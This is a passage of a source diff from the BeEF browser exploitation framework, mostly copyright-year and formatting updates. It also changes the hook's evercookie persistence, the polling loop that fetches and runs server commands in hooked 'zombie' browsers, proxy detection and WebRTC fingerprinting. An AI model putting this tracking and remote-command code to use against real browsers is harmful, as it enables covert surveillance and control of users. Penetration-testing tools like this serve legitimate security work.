 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
    beefhook: "<%= @hook_session_name %>",
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
  	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
  	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	/**
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -15,6 +15,7 @@ beef.updater = {
 	// XHR-polling timeout.
    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
    beefhook: "<%= @hook_session_name %>",
 	// A lock.
 	lock: false,
@@ -46,9 +47,8 @@ beef.updater = {
 				this.get_commands();    /*Polling*/
 			}
 		}
-
+        /* The following gives a stupid syntax error in IE, which can be ignored*/
-      // ( typeof beef.websocket === "undefined")
+        setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
 		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
    /**
@@ -57,7 +57,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                if (response.body != null && response.body.length > 0)
                    beef.updater.execute_commands();
            });
@@ -80,6 +80,9 @@ beef.updater = {
 				command();
 			} catch(e) {
 				console.error('execute_commands - command failed to execute: ' + e.message);
                // prints the command source to be executed, to better trace errors
                // beef.client_debug must be enabled in the main config
                beef.debug(command.toString());
 			}
 		}
 		this.lock = false;
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,14 +22,14 @@ module BeEF
      # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
      def initialize(config)
        raise Exception::TypeError, '"config" needs to be a string' if not config.string?
-        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
+        raise Exception::TypeError, "Configuration file '#{config}' cannot be found" if not File.exist?(config)
        begin
          #open base config
          @config = self.load(config)
          # set default value if key? does not exist
          @config.default = nil
          @@config = config
-        rescue Exception => e
+        rescue => e
          print_error "Fatal Error: cannot load configuration file"
          print_debug e
        end
@@ -44,7 +44,7 @@ module BeEF
          return nil if not File.exists?(file)
          raw = File.read(file)
          return YAML.load(raw)
-        rescue Exception => e
+        rescue => e
          print_debug "Unable to load '#{file}' #{e}"
          return nil
        end
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -86,7 +86,7 @@ module Banners
        print_success "running on network interface: #{host}"
        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
        print_more data
      end
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,75 +7,75 @@
 module BeEF
 module Core
 module Constants
-  
+
  module Browsers
-   	FF      = 'FF'       # Firefox
+    FF      = 'FF'       # Firefox
-   	M       = 'M'        # Mozila
+    M       = 'M'        # Mozilla
-   	IE      = 'IE'       # Internet Explorer
+    IE      = 'IE'       # Internet Explorer
-   	S       = 'S'        # Safari
+    S       = 'S'        # Safari
-   	K       = 'K'        # Konqueror
+    K       = 'K'        # Konqueror
-   	C       = 'C'        # Chrome
+    C       = 'C'        # Chrome
    O       = 'O'        # Opera
-   	ALL     = 'ALL'      # ALL
+    ALL     = 'ALL'      # ALL
-   	UNKNOWN = 'UN'       # Unknown
+    UNKNOWN = 'UN'       # Unknown
-	
+
-   	FRIENDLY_FF_NAME  = 'Firefox' 
+    FRIENDLY_FF_NAME  = 'Firefox'
-   	FRIENDLY_M_NAME   = 'Mozila'
+    FRIENDLY_M_NAME   = 'Mozilla'
-   	FRIENDLY_IE_NAME  = 'Internet Explorer'
+    FRIENDLY_IE_NAME  = 'Internet Explorer'
-   	FRIENDLY_S_NAME   = 'Safari'
+    FRIENDLY_S_NAME   = 'Safari'
-   	FRIENDLY_K_NAME   = 'Konqueror'
+    FRIENDLY_K_NAME   = 'Konqueror'
-   	FRIENDLY_C_NAME   = 'Chrome'
+    FRIENDLY_C_NAME   = 'Chrome'
    FRIENDLY_O_NAME   = 'Opera'
-   	FRIENDLY_UN_NAME  = "UNKNOWN"
+    FRIENDLY_UN_NAME  = 'UNKNOWN'
- 
+
-    # Attempt to retrieve a browsers friendly name
+    # Attempt to retrieve a browser's friendly name
    # @param [String] browser_name Short browser name
    # @return [String] Friendly browser name
-   	def self.friendly_name(browser_name)
+    def self.friendly_name(browser_name)
-	  
+
-   	  case browser_name
+      case browser_name
-   	    when FF;       return FRIENDLY_FF_NAME 
+        when FF;       return FRIENDLY_FF_NAME
-   	    when M;        return FRIENDLY_M_NAME 	   
+        when M ;       return FRIENDLY_M_NAME
-   	    when IE;       return FRIENDLY_IE_NAME   	   
+        when IE;       return FRIENDLY_IE_NAME
-   	    when S;        return FRIENDLY_S_NAME  	   
+        when S ;       return FRIENDLY_S_NAME
-   	    when K;        return FRIENDLY_K_NAME  	   
+        when K ;       return FRIENDLY_K_NAME
-        when C;        return FRIENDLY_C_NAME
+        when C ;       return FRIENDLY_C_NAME
-        when O;        return FRIENDLY_O_NAME
+        when O ;       return FRIENDLY_O_NAME
        when UNKNOWN;  return FRIENDLY_UN_NAME
-   	  end
+      end
-	    
+
-  	end
+    end
    # Attempt to match the browserstring to a browser constant
    # @param [String] browserstring Browser UA string
    # @return [Array] An array of matching browser constants
    # @todo Confirm this function returns an array if multiple constants are matched
-  	def self.match_browser(browserstring)
+    def self.match_browser(browserstring)
-  		matches = []
+      matches = []
-			browserstring.split(" ").each do |chunk|
+      browserstring.split(" ").each do |chunk|
-			  case chunk
+        case chunk
-			    when /Firefox/ , /FF/
+        when /Firefox/, /FF/
-				    matches << FF
+          matches << FF
-			    when /Mozilla/
+        when /Mozilla/
-				    matches << M
+          matches << M
-				  when /Internet Explorer/, /IE/
+        when /Internet Explorer/, /IE/
-					  matches << IE
+          matches << IE
-				  when /Safari/
+        when /Safari/
-			      matches << S
+          matches << S
-				  when /Konqueror/
+        when /Konqueror/
-				    matches << K
+          matches << K
-				  when /Chrome/
+        when /Chrome/
-				    matches << C
+          matches << C
-         when /Opera/
+        when /Opera/
-				    matches << O
+          matches << O
-				end
+        end
-			end
+      end
-			matches.uniq
+      matches.uniq
-	  end
+    end
  end
-  
+
 end
 end
 end
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
+	HW_GOOGLE_UA_STR      = 'Nexus'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -68,6 +68,7 @@ module BeEF
                      }
          zombie.httpheaders = @http_headers.to_json
          zombie.save
          #puts "HTTP Headers: #{zombie.httpheaders}"
          # add a log entry for the newly hooked browser
          BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
            self.err_msg "Invalid browser name returned from the hook browser's initial connection."
          end
          # detect browser proxy
          using_proxy = false
          [
            'CLIENT_IP',
            'FORWARDED_FOR',
            'FORWARDED',
            'FORWARDED_FOR_IP',
            'PROXY_CONNECTION',
            'PROXY_AUTHENTICATE',
            'X_FORWARDED',
            'X_FORWARDED_FOR',
            'VIA'
          ].each do |header|
            unless JSON.parse(zombie.httpheaders)[header].nil?
              using_proxy = true
              break
            end
          end
          # retrieve proxy client IP
          proxy_clients = []
          [
            'CLIENT_IP',
            'FORWARDED_FOR',
            'FORWARDED',
            'FORWARDED_FOR_IP',
            'X_FORWARDED',
            'X_FORWARDED_FOR'
          ].each do |header|
            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
          end
          # retrieve proxy server
          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
          # store and log proxy details
          if using_proxy == true
            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
            proxy_log_string = "#{zombie.ip} is using a proxy"
            unless proxy_clients.nil?
              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
            end
            unless proxy_server.nil?
              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
              proxy_log_string += " [server: #{proxy_server}]"
            end
            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
          end
          # get and store browser version
          browser_version = get_param(@data['results'], 'BrowserVersion')
          if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -199,14 +250,6 @@ module BeEF
            self.err_msg "Invalid window size returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for JavaEnabled
          java_enabled = get_param(@data['results'], 'JavaEnabled')
          if BeEF::Filters.is_valid_yes_no?(java_enabled)
            BD.set(session_id, 'JavaEnabled', java_enabled)
          else
            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for VBScriptEnabled
          vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
          if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -255,6 +298,14 @@ module BeEF
            self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasWebRTC
          has_webrtc = get_param(@data['results'], 'HasWebRTC')
          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
            BD.set(session_id, 'HasWebRTC', has_webrtc)
          else
            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasActiveX
          has_activex = get_param(@data['results'], 'HasActiveX')
          if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -295,14 +346,6 @@ module BeEF
            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasVLC
          has_vlc = get_param(@data['results'], 'HasVLC')
          if BeEF::Filters.is_valid_yes_no?(has_vlc)
            BD.set(session_id, 'HasVLC', has_vlc)
          else
            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
          end
          # get and store the value for CPU
          cpu_type = get_param(@data['results'], 'CPU')
          if !cpu_type.nil?
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -51,13 +51,18 @@ module Handlers
      # @note is a known browser so send instructions 
      else       
        # @note Check if we haven't seen this browser for a while, log an event if we haven't
        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
        end
        # @note record the last poll from the browser
        hooked_browser.lastseen = Time.new.to_i
        # @note Check for a change in zombie IP and log an event
        if config.get('beef.http.use_x_forward_for') == true
          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
          end
        else
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,7 +21,7 @@ module BeEF
            beef_js_path = "#{$root_dir}/core/main/client/"
            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
            # @note BeEF libraries: need Eruby evaluation and obfuscation
            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -80,8 +80,9 @@ module BeEF
            # @note set the XHR-polling timeout
            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
            # @note if http_port <> public_port in config ini, use the public_port
            unless hook_session_config['beef_public_port'].nil?
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,6 +29,7 @@ module BeEF
              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
            else
              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
              (print_error "Could not find command module with ID #{command.command_module_id}"; return) if key.nil?
              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
            end
@@ -52,7 +53,7 @@ module BeEF
            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
              #content = command_module.output.gsub('//
              #//
-              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
              #//   See the file 'doc/COPYING' for copying permission
              #//
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -36,10 +36,9 @@ module Core
      raise Exception::TypeError, '"from" needs to be a string' if not from.string?
      raise Exception::TypeError, '"event" needs to be a string' if not event.string?
      raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
      # logging the new event into the database
      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
-
+      print_debug "Event: #{event}"
      # if notifications are enabled send the info there too
      if @notifications
        @notifications.new(from, event, time_now, hb)
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -80,6 +80,7 @@ module Models
      return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
      return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
      return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
      return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
      return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
      return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
      return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
      return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
      BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
    end
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/handlers/raw.rb
+++ b/core/main/network_stack/handlers/raw.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/handlers/redirector.rb
+++ b/core/main/network_stack/handlers/redirector.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -94,7 +94,7 @@ module BeEF
          #              execute(msg_hash)
          #            end
          #          }
-          #        rescue Exception => e
+          #        rescue => e
          #          print_error "WebSocket-secured error: #{e}"
          #        end
          #      end
@@ -150,7 +150,7 @@ module BeEF
          #            execute(msg_hash)
          #          end
          #        }
-          #      rescue Exception => e
+          #      rescue => e
          #        print_error "WebSocket error: #{e}"
          #      end
          #    end
@@ -203,7 +203,7 @@ module BeEF
                      execute(msg_hash)
                    end
                  }
-                rescue Exception => e
+                rescue => e
                  print_error "WebSocket error: #{e}"
                end
              end
--- a/core/main/rest/api.rb
